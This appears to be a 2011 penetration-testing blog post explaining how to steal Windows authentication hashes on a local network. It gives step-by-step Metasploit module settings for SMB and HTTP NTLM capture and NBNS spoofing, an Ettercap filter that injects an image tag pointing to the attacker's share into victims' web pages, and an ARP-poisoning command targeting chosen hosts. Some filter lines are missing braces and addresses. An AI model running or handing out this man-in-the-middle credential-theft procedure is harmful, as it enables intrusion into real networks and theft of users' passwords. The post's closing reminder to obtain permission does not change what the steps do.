Tuesday, 1 November 2011

Using Ettercap to improve NetBIOS attacks

For those of you that have tried out NetBIOS spoofing, (explained Here), you know how devastatingly effective this is on an internal network. There are however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are just getting NTLMv2 hashes that you just can't seem to crack. If only you could somehow force those XP clients to send over their user's LM hashes...
Well... it seems you can with Ettercap, and it works very well too.
One of the great things about Ettercap, is that you can do so much more with man-in-the-middle attacks versus Cain for instance. DNS spoofing, ARP spoofing, iframe injections and many more are possible with this tool. Today though we are going to use a custom filter in an attempt to force the clients, via some HTML injection,  to connect to a fake share on our machine so that we can then harvest their authentication hashes.

Remember, for this attack to work, you will need to be targetting wired clients on the network (unless they are using open or WEP wifi) as we will be actively changing their traffic, and this would not be possible on a WPA network due to the individual client encryption keys being used.

First of all you will need to setup metasploit...
Let's see if we can find some low hanging fruit (XP machines)

use auxiliary/scanner/smb/smb_version

Excellent some target XP machines. Make a note of these IP addresses as we will need to target these with Ettercap next.

Now we need to get out filter configured for Ettercap. As you can see from looking at the filter below, we will be adding in an HTML tag into the web pages that the target will be viewing. This tag will tell the browser that it needs to load an image to display on the page and to load it from a share on your IP.
The image wont be there, but Metasploit will capture these requests, spoof the challenge, and capture the user's hash.

Modify the following filter to your own IP address, and save this as netbios.filter.

 if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Rubbish!")) {
      replace("Accept-Rubbish!", "Accept-gnidocnE");
      msg("Encoding Taken Care Of...\n");
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head> <img src=\"
\\\\\\pixel.gif\"> ");
msg("Replacement Filter Ran.\n");

Next, we need to install Ettercap: apt-get install ettercap
then within the /usr/local/share/ettercap folder, run etterfilter /root/netbios.filter -o netbios.ef.
This will complile the filter into a format Ettercap can understand.

We now need to return to Metasploit and setup the netbios spoofing modules to be ready to capture the incoming hashes, you can use the following resource script to save time:

use auxiliary/server/capture/smb
set srvhost
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
use auxiliary/server/capture/http_ntlm
set srvhost
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
set uripath /share
set srvport 80
use auxiliary/spoof/nbns/nbns_response
set spoofip

Once you have this running, we can now start ettercap:

ettercap -TqF netbios.ef -M arp:remote /,29,30/ /<gatewayIP>/ -i eth0

This will fire up Ettercap in text mode (T) without verbose info (q) and with the netbios filter (F) using the arp spoofing method (M) against the 3 XP clients.

Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

Remember to press "q" once you have these hashes so that Ettercap will re-poison them to prevent any network drop-out.

Make sure you have permission first, and have fun folks!

1 comment: